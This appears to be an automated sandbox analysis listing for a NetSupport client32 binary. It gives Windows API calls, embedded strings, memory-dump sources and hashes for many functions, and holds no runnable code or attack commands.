                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              APIs
                                                                              • GetVersion.KERNEL32(?,1113A2AB,00000001,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102D75C
                                                                              • InterlockedIncrement.KERNEL32(111EE418), ref: 1102D799
                                                                              • InterlockedDecrement.KERNEL32(111EE418), ref: 1102D7C0
                                                                              Strings
                                                                              • EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102D77F
                                                                              • SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102D7A6, 1102D7CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$DecrementIncrementVersion
                                                                              • String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
                                                                              APIs
                                                                              • GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                              • LoadIconA.USER32(1109350C,00002716), ref: 11093456
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 11093465
                                                                              • RegisterClassA.USER32(?), ref: 11093483
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClassLoad$CursorIconInfoRegister
                                                                              • String ID: NSMClassList
                                                                              • API String ID: 2883182437-2474587545
                                                                              • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                              • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                              • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                              • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
                                                                              APIs
                                                                              • LoadStringA.USER32(00000000,00000000,?,11112FE6), ref: 11145678
                                                                              • wsprintfA.USER32 ref: 1114568E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LoadStringwsprintf
                                                                              • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                              • API String ID: 104907563-3240211118
                                                                              • Opcode ID: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                              • Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
                                                                              • Opcode Fuzzy Hash: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                              • Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,11037F05), ref: 11145463
                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11145475
                                                                              • FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadProc
                                                                              • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                              • API String ID: 145871493-545709139
                                                                              • Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                              • Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
                                                                              • Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                              • Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                              • SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                              • API String ID: 2446111109-1196874063
                                                                              • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                              • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                              • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                              • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                              APIs
                                                                              • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017428
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
                                                                              • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017458
                                                                              • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageWindow$FindLongPostSend
                                                                              • String ID: IPTip_Main_Window
                                                                              • API String ID: 3445528842-293399287
                                                                              • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                              • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                              • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                              • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                              APIs
                                                                                • Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,EE49F673,00000000,00000000,00000000,110CF110,?,00000001), ref: 110CEE2A
                                                                                • Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEE92
                                                                              • IsWindow.USER32(?), ref: 110CF82B
                                                                                • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                              • RemovePropA.USER32(?), ref: 110CF858
                                                                              • DeleteObject.GDI32(?), ref: 110CF86C
                                                                              • DeleteObject.GDI32(?), ref: 110CF876
                                                                              • DeleteObject.GDI32(?), ref: 110CF880
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 1921910413-0
                                                                              • Opcode ID: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                              • Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
                                                                              • Opcode Fuzzy Hash: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                              • Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2
                                                                              APIs
                                                                              Strings
                                                                              • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
                                                                              • %02x, xrefs: 11081610
                                                                              • ..\CTL32\DataStream.cpp, xrefs: 1108165E
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf
                                                                              • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                              • API String ID: 2111968516-476189988
                                                                              • Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                              • Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
                                                                              • Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                              • Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
                                                                              APIs
                                                                                • Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6
                                                                              • SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                              • SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                              • DeleteObject.GDI32(?), ref: 1111F4E4
                                                                              • DeleteObject.GDI32(?), ref: 1111F4F1
                                                                              • DeleteObject.GDI32(?), ref: 1111F516
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                              • API ID: DeleteObject$PaletteSelect
                                                                              • String ID:
                                                                              • API String ID: 2820294704-0
                                                                              • Opcode ID: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                              • Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
                                                                              • Opcode Fuzzy Hash: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                              • Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1
                                                                              APIs
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110259D7
                                                                              • GetDlgItem.USER32(?,00001399), ref: 11025A11
                                                                              • TranslateMessage.USER32(?), ref: 11025A2A
                                                                              • DispatchMessageA.USER32(?), ref: 11025A34
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025A76
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: Message$DispatchItemTranslate
                                                                              • String ID:
                                                                              • API String ID: 1381171329-0
                                                                              • Opcode ID: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
                                                                              • Instruction ID: 1d3eb3fe4f0069694488dcbc6a13b2e6f5653f41aef2ba1524fd952247bef68a
                                                                              • Opcode Fuzzy Hash: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
                                                                              • Instruction Fuzzy Hash: 9721D171E0030B5BE714DAA1CC85BEFB7E8AF44308F404029EA2797580FA75E401CB94
                                                                              APIs
                                                                                • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                              • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                              • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                              • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                              • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                              Strings
                                                                              • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                              • Global\Client32Provider, xrefs: 1104F1BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                              • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                              • API String ID: 3682529815-1899068400
                                                                              • Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                              • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                              • Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                              • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 11163972
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • _free.LIBCMT ref: 11163985
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: AllocateHeap_free_malloc
                                                                              • String ID:
                                                                              • API String ID: 1020059152-0
                                                                              • Opcode ID: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
                                                                              • Instruction ID: 99a0502aaeb7ade96a4deef53194f79690bd7c081ca6f8299ad08a7ab0eaa67e
                                                                              • Opcode Fuzzy Hash: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
                                                                              • Instruction Fuzzy Hash: 6D110837618637AADB121B74A808649FB9CAF843F8B214126E85D96140FEB2D460CF90
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B395F
                                                                              • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B397E
                                                                              • GetSystemMetrics.USER32(0000004C), ref: 110B39A7
                                                                              • GetSystemMetrics.USER32(0000004D), ref: 110B39AD
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,1104362F,?,?,?), ref: 110B39DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: CriticalSection$LeaveMetricsSystem$Enter
                                                                              • String ID:
                                                                              • API String ID: 4125181052-0
                                                                              • Opcode ID: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                              • Instruction ID: 2eabc0a5c64141517199ab689f696fc8c069b56ecca888d5095ec5d0d1156609
                                                                              • Opcode Fuzzy Hash: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                              • Instruction Fuzzy Hash: 6F11B132600608DFD314CF79C9849AAFBE5FFD8314B20866ED51A87614EB72E806CB80
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 11171312
                                                                                • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                              • __getptd.LIBCMT ref: 11171329
                                                                              • __amsg_exit.LIBCMT ref: 11171337
                                                                              • __lock.LIBCMT ref: 11171347
                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                              • String ID:
                                                                              • API String ID: 938513278-0
                                                                              • Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                              • Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
                                                                              • Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                              • Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E), ref: 1114542A
                                                                                • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                                • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                                • Part of subcall function 110CC360: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CC39C
                                                                                • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                                • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                                • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                                • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                                • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                              • std::exception::exception.LIBCMT ref: 11053483
                                                                              • __CxxThrowException@8.LIBCMT ref: 11053498
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 2181554437-3415836059
                                                                              • Opcode ID: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                              • Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
                                                                              • Opcode Fuzzy Hash: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                              • Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick
                                                                              • String ID: General$TicklePeriod
                                                                              • API String ID: 536389180-1546705386
                                                                              • Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                              • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                              • Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                              • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
                                                                              APIs
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 11077511
                                                                              • CopyRect.USER32(?,00000004), ref: 1107753F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110774F9
                                                                              • m_hWnd, xrefs: 110774FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2755825785-2830328467
                                                                              • Opcode ID: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                              • Instruction ID: 59158522108a3a71f1e5bb0466e943617169e98ae829cc3baa7e2fe2b27ff523
                                                                              • Opcode Fuzzy Hash: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                              • Instruction Fuzzy Hash: 5841C271E00B46DBCB15CF68C9C8B6EB7F1EF44344F10856AD8569B644EBB0E940CB98
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 110D1378
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                              • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                              • API String ID: 1528188558-323366856
                                                                              • Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                              • Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
                                                                              • Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                              • Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,0000000E), ref: 11160E88
                                                                                • Part of subcall function 11160D17: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 11160D4F
                                                                                • Part of subcall function 11160D17: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 11160D90
                                                                                • Part of subcall function 11160D17: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 11160DB4
                                                                                • Part of subcall function 11160D17: RegCloseKey.ADVAPI32(?), ref: 11160DE1
                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 11160E4A
                                                                              • LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 11160E60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                              • String ID: hhctrl.ocx
                                                                              • API String ID: 1060647816-2298675154
                                                                              • Opcode ID: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                              • Instruction ID: 29a85e5adb823bcef9c03dae075ae2b4ea3bdd8fdf15b4c5e271eae4de8d38be
                                                                              • Opcode Fuzzy Hash: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                              • Instruction Fuzzy Hash: DF118E7170423A9BDB05CFA9CD90AAAF7BCEB4C708B00047DE511D3244EBB2E958CB50
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 11005981
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 110059BC
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessReleasewsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
